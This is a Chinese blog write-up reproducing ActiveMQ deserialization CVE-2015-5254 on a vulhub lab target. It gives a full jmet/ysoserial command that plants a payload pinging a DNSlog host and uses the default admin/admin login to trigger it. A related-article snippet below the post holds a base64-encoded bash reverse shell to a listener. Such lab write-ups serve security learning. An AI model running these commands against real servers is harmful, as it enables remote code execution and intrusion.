ActiveMQ反序列化漏洞(CVE-2015-5254)复现

最新推荐文章于 2024-09-13 10:39:45 发布
原创 最新推荐文章于 2024-09-13 10:39:45 发布 · 401 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#activemq #java #渗透测试

本文档详细介绍了如何复现ActiveMQ的CVE-2015-5254反序列化漏洞。首先,通过Nmap扫描确认靶机上的ActiveMQ端口,接着访问管理页面验证环境部署。然后,利用Java消息利用工具jmet,构造特定的命令注入到ActiveMQ的队列中。最后,通过管理页面触发队列中的Payload,成功执行命令,验证漏洞存在。

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

前言

靶场使用的vulhub
靶机:192.168.44.128
kali :192.168.44.129

基础知识

MQ(Message Queue):消息队列。消息服务将消息放在队列中,在合适的时候发给接收者。发送和接收是异步的(发送者和接收者的生命周期没有必然关系)。

漏洞原理

该漏洞由于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

适用版本

ActiveMQ 5.13.0之前d的5.x版本

复现过程

  • 先扫一波端口(虽然已经知道是哪个端口),就当是复习Nmap了。通过扫描出的端口,判断为activeMQ的两个默认端口8161和61616。8161是网络管理页面端口,61616是工作端口,消息在此端口上传递。
    在这里插入图片描述

  • 访问管理页面,长这样↓,说明环境部署成功。
    在这里插入图片描述

  • 这里需要用到Java消息利用工具-- jmet,wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar,jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。
    在这里插入图片描述

  • 构造利用语句,给目标的ActiveMQ添加一个名为 event 的队列,让靶场去ping DNSlog, java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "ping xxxxxx.ceye.io" -Yp ROME 192.168.44.128 61616jemt用法及参数说明
    在这里插入图片描述

  • 访问 192.168.44.128:8161/admin/browse.jsp?JMSDestination=event
    可以看到队列中的消息,默认密码【admin | admin】,点击任意ID即可执行该ID相应的语句。
    在这里插入图片描述

  • 成功访问DNSlog
    在这里插入图片描述

哇·咔咔
关注
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 841
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
Ayixy的博客
05-24 1030
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmet的jar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
ActiveMQ反序列化漏洞CVE-2015-5254
chaojixiaojingang
01-22 608
1.漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2.影响版本 Apache ActiveMQ 5.13.0之前5.x版本 3.漏洞环境搭建 靶机:安装daocker环境centos7: 192.168....
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 630
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmet的jar文件,并在同目录下创建一个external文件夹 链接:https://g...
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 553
ActiveMQ反序列化漏洞CVE-2015-5254复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1699
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
m0_59839948的博客
09-05 1953
广东东软学院的学生,web安全技术漏洞复现可以参考
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1595
ActiveMQ 反序列化漏洞
ActiveMQ 反序列化漏洞CVE-2015-5254
黑白的博客
12-21 1373
声明 好好学习,天天向上 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-201
ActiveMQ 反序列化漏洞复现CVE-2015-5254
浮生一世暖流年的博客
12-18 348
环境搭建 使用vulhub搭建环境,docker-compose up -d 环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口61616是工作端口复现过程 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消息,发送给目标61616端口 访问web管理页面,读取消息,触发漏洞 生成序列化对象 使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。 java -jar jmet-0.1.0-all.jar
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 漏洞复现
wswr的博客
03-04 1331
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-优快云博客_kali搭建靶场 原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。 Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 618
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
ActiveMQ 反序列化漏洞CVE-2015-5254)特征分析
xhscxj的博客
11-24 1048
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 反序列化漏洞CVE-2015-5254复现
糖小喵
04-12 398
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...
CVE-2015-5254ActiveMQ-反序列化漏洞
最新发布
m0_74168970的博客
09-13 1313
因此这条消息就是bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}"监听了61616和8161端口,其中61616是工作端口,消息就在这个端口进行传递;8161是web管理页面的端口,访问127.0.0.1:8186即可访问,不过这个漏洞理论上不需要web的。,或者使用云悉指纹识别,我这里是本地,云悉是不可以识别本地的。3、访问web管理页面,读取消息,触发漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值